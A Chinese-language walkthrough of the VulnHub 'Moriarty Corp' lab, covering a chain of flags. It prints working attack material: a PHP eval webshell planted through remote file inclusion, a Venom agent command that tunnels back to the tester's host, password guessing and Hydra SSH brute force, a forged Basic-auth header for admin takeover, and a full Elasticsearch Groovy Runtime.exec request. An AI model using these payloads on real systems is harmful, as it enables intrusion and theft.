主要考察知識點

文件包含內網穿透命令上傳弱口令更改權限HTTP協議HeaderElasticSearch-CVE暴力破解

網絡拓撲

寫完之后把靶機的網絡拓撲也做了一下

寫在之前

這次用的虛擬機是VM_VirtualBox,第一次用，配置了許久，因為靶機是內網環境，所以有些網絡配置需要手動調整

網絡配置設置成如上，再次掃描IP，根據MAC地址就可以找到我們的靶機IP了。

靶機下載地址：

BoredHackerBlog: Moriarty Corp

滲透過程

IP發現
這里使用的windows的環境進行滲透測試，使用Advanced_IP_Scanner進行內網IP掃描

根據MAC地址發現IP，對獲取到的IP進行端口掃描

端口掃描

這里使用的是御劍端口掃描器進行發現

發現存在8000端口和9000端口可疑端口，嘗試進行WEB訪問

WEB滲透

訪問8000端口

是一個提交flag的頁面，同時顯示了我們的任務進度，首先根據提示提交第一個flag

再次顯示新的提示

結合強大的百度翻譯和谷歌翻譯，大概明白了讓我們從80端口開始滲透，然后在此提交flag，這個時候再次訪問80端口

已經可以成功訪問了，正式開始我們的滲透過程

據url發現疑似存在文件包含漏洞，嘗試讀取一下敏感數據

成功讀取/etc/passwd文件，我們構造一下查看能否遠程包含webshell

首先在本地服務器構造webshell

<?php eval($_REQUEST['pdsdt']); echo 'Welcome Hacker'; phpinfo(); ?>

嘗試遠程文件包含

成功包含遠程文件，使用蟻劍鏈接webshell

找尋flag和下一步的信息

在根目錄下發現flag文件

在8000頁面進行提交，提交完畢之后再次給了我們提示

大概意思就是告訴我們網站的web服務已經沒有什么有價值的信息了，下一步需要內網滲透，同時給了我們內網的網段，下一步就是轉發流量進行內網滲透了

內網滲透-設置代理

設置內網代理，這里設置內網代理的方式有很多種，也可以使用MSF全程進行測試，因為為了方便，這里使用的是Venom&proxifier進行流量轉發

首先上傳agent服務端節點

在windows端啟動admin程序監聽

admin.exe -lport 9999

在agent端修改程序權限為777，并執行命令

./agent_linux_x64 -rhost 192.168.1.101 -rport 9999

成功監聽到數據

設置sock5代理

設置proxifier

嘗試內網訪問靶機

成功訪問

下一步進行具體的內網漫游了

首先獲取一下內網存活的靶機，根據題目提示的網段進行掃描

發現172.17.0.4的靶機存在web頁面，嘗試訪問一下

發現是一個上傳文件的點，同時需要我們輸入密碼才能成功上傳，先burp抓包，跑一下常見的弱口令

抓到包了，嘗試fuzz一下密碼

當嘗試弱口令password時，顯示成功上傳…

根據反饋的頁面，嘗試訪問我們的webshell

代碼執行成功，說明成功上傳，蟻劍連接一下

再次找到一個flag文件，嘗試在8000頁面提交

頁面再次給出了提示

大概的意思就是給了我們用戶名和加密的密碼，讓破解這些hash加密的密碼后嘗試ssh登陸

username: root toor admin mcorp moriarty password: 63a9f0ea7bb98050796b649e85481845 7b24afc8bc80e548d66c4e7ff72171c5 5f4dcc3b5aa765d61d8327deb882cf99 21232f297a57a5a743894a0e4a801fc3 084e0343a0486ff05530df6c705c8bb4 697c6cc76fdbde5baccb7b3400391e30 8839cfc8a0f24eb155ae3f7f205f5cbc 35ac704fe1cc7807c914af478f20fd35 b27a803ed346fbbf6d2e2eb88df1c51b 08552d48aa6d6d9c05dd67f1b4ba8747

同時提示我們密碼需要暴力枚舉，二話不說使用cmd5和somd5,最后查詢的結果：

再次掃描一下內網存在22端口的機子

發現172.17.0.5的SSH端口是開放的，根據獲取到的信息構造字典，使用SSH爆破工具進行爆破（最后使用Hydra進行爆破成功的）

獲取到密碼為：

root / weapons

使用xshell進行登陸

再次獲取到flag

我們在8000端口進行提交，再次更新了提示

大概意思就是內網里面還有個聊天的程序，端口不在80讓我們掃描一下他指定的幾個端口，同時給了一個賬戶，讓我們獲取管理員用戶的記錄，先用指定的端口掃描一下網段

發現172.17.0.6的8000端口是開放的，嘗試訪問一下

提示我們需要登陸，根據剛才提示給我們的賬戶進行登陸

Here are the credentials our agent has obtained from another source: username: buyer13 password: arms13

登陸成功

發現網站有兩個功能，查看聊天記錄，修改密碼，嘗試訪問修改密碼頁面，抓一下包，看看是否存在任意用戶密碼重置

修改用戶名為admin

瀏覽數據包，發現在header頭中存在問題

Authorization: Basic YnV5ZXIxMzphcm1zMTM=

解密一下

攜帶的是用戶的姓名和密碼，我們嘗試構造一下管理員的身份并修改密碼為admin

Authorization: Basic YWRtaW46YWRtaW4=

回到web頁面，重新登陸，或者更改header頭訪問

成功登陸admin用戶，訪問chats

再次獲取到flag，提交

我看了半天，這不是ES嘛，最近做項目正在用的東西，真是巧兒他媽給巧兒開門，巧兒到家了，掃描一下網段的9200端口

訪問一下頁面，標準的ES搜索頁面

嘗試一下ES的任意代碼執行漏洞

構造數據包，創建一條數據

POST /mitian/mitian6/ HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 19 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 Content-Type: text/plain Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close{ "name": "pdsdt"}

之后再search頁面進行構造

POST /_search?pretty HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 156 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 Content-Type: text/plain Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}

成功執行命令，讀取一下flag

成功獲取到flag文件，提交

顯示任務完成，并將我們的IP加入了黑名單，真就卸磨殺驢

總結

這個靶機花了我大半天的時間，主要還是在網絡配置上面的捯飭，內網的靶機每一個都不太難，重要的就是如何通過流量轉發后正確的使用一些工具達到掃描端口爆破服務的目的，總體的收獲還是挺大的，雖然和真實環境相比確實差別較大，但剛好最近就在用ES這方面的產品，也趁著這個機會對于ES的相關漏洞也加強了學習。

問題

有沒有想學網絡安全但又不知道該怎么入手的朋友啊？

我這里整理的大部分的學習資料，有需要沒有

總結

以上是生活随笔為你收集整理的vulnhub_内网渗透测试的记录——网络安全的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。